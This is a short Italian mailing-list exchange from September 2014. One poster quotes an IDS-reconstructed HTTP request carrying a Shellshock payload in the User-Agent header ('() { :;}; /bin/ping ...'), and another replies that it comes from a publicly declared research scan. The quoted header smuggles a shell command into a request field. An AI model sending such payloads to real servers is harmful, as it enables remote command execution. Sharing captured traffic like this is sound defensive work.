Il 25/09/2014 12:04, Jan ha scritto: 

>Da noi è già arrivato un drone che esegue 

>GET /cgi-sys/defaultwebpage.cgi HTTP/1.0{0D}{0A} 
>User-Agent: () { :;}; /bin/ping -c 1 192.168.0.1{0D}{0A} 
>Accept: */*{0D}{0A} 
>{0D}{0A} 

>(sessione ricostruita con l'IDS, con 192.168.0.1 sostituisco l'indirizzo 
>reale del collettore dell'attaccante) 

>Jan 


Ciao Jan, lo scan in questione, per quanto "scocciante" possa sembrare, è ben 
dichiarato in questo link: 
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html#.VCQI-a1dTRY
 

fastfire 

Rispondere a